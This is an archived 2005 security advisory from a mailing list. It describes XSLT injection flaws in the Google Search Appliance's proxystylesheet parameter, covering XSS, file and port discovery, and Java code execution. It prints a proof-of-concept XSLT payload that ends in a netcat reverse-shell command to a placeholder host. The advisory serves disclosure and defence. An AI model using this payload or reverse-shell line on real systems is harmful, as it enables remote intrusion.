[NEWS] Google Search Appliance Proxystyle*** XSLT Multiple Vulnerabilities (XSS, Information disclosure, Java Code Execution)
From: SecuriTeam (support_at_securiteam.com)
Date: 11/21/05
- Previous message: SecuriTeam: "[EXPL] Multiple Vulnerabilities Google Search Appliance Proxystyle*** (Multiple XSS, Multiple Information disclosure, Java Code Execution, Exploit)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 21 Nov 2005 16:18:38 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Google Search Appliance Proxystyle*** XSLT Multiple Vulnerabilities
(XSS, Information disclosure, Java Code Execution)
------------------------------------------------------------------------
SUMMARY
"The <http://www.google.com/enterprise/> Google Mini offers
cost-effective, high-quality search for your public website or intranet "
By supplying a malicious XSLT, attackers may execute arbitrary programs,
retrieve system information or cause XSS vulnerability with Google mini
appliance.
DETAILS
Vulnerable Systems:
* Google Mini Search Appliance
The Google Search Appliance allows customization of the search interface
through XSLT style sheets. Certain versions of the appliance allow a
remote URL to be supplied as the path to the XSLT style ***. This
feature can be abused to perform cross-site scripting (XSS), file
discovery, service enumeration, and arbitrary command execution.
The Google Search Appliance search interface uses the 'proxystyle***'
form variable to determine what style *** to apply to the search
results. This variable can be a local file name or a HTTP URL.
Error Message XSS:
A cross-site scripting flaw can be exploited by providing a snippet of
malicious Javascript code for the proxystyle*** variable. The appliance
will look for a local file by that name and then display an error message
containing the Javascript code.
XSLT Style *** XSS:
A cross-site scripting flaw can be exploited by creating a malicious XSLT
style *** and specifying the URL to this style *** in the
proxystyle*** parameter. The appliance will download the style *** and
present the malicious Javascript to the user who executed the search.
Information disclosure 1:
It is possible to determine the existence of any file on the system by
using a relative path from the style *** directory. The error message
returned from the server will disclose whether or not a valid path was
provided. This can be used to fingerprint the base operating system and
kernel version.
Information disclosure 2:
A rudimentary port scan can be performed by requesting HTTP URLs that
point to a target system and individual ports on that system. The error
message returned from the server will differ between open and closed
ports. The appliance will ignore requests to connect back to itself, but
no other restrictions apply.
XSLT Java Code Execution:
It is possible to execute arbitrary Java class methods on the appliance by
creating a malicious XSLT style ***. System commands can be executed as
an unprivileged user, which combined with the vulnerable kernel version,
can lead to a remote root shell. The appliance uses the Saxon XSLT parser,
which allows the following snippet to work:
< !-- Google Mini XSLT Code Execution [metasploit] -->
XSLT Version: < xsl:value-of select="system-property('xsl:version')"/ >
< br / >
XSLT Vendor: < xsl:value-of select="system-property('xsl:vendor')" / >
< br / >
XSLT URL: < xsl:value-of select="system-property('xsl:vendor-url')" / >
< br / >
OS: < xsl:value-of select="sys:getProperty('os.name')" / >
< br / >
Version: < xsl:value-of select="sys:getProperty('os.version')" />
< br / >
Arch: < xsl:value-of select="sys:getProperty('os.arch')" / >
< br / >
UserName: < xsl:value-of select="sys:getProperty('user.name')" / >
< br / >
UserHome: < xsl:value-of select="sys:getProperty('user.home')" / >
< br / >
UserDir: < xsl:value-of select="sys:getProperty('user.dir')" / >
< br />
Executing command...< br / >
< xsl:value-of select="run:exec(run:getRuntime(), 'sh -c nc${IFS}
255.255.255.255${IFS}53|sh|nc${IFS}255.255.255.255${IFS}53')" / >
< /span >
< /xsl:template >
Vendor Status:
The vendor has issued a fix for customers.
ADDITIONAL INFORMATION
The information has been provided by <mailto:fdlist@digitaloffense.net> H
D Moore.
The original article can be found at:
<http://metasploit.com/research/vulns/google_proxystyle***/>
http://metasploit.com/research/vulns/google_proxystyle***/
OSVDB advisories can be found at: <http://osvdb.org/20977>
http://osvdb.org/20977, <http://osvdb.org/20978> http://osvdb.org/20978,
<http://osvdb.org/20979> http://osvdb.org/20979,
<http://osvdb.org/20980> http://osvdb.org/20980,
<http://osvdb.org/20981> http://osvdb.org/20981
Google's Mini appliance security issues can be found at:
<http://www.google.com/support/gsa/bin/answer.py?answer=15857>
http://www.google.com/support/gsa/bin/answer.py?answer=15857
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
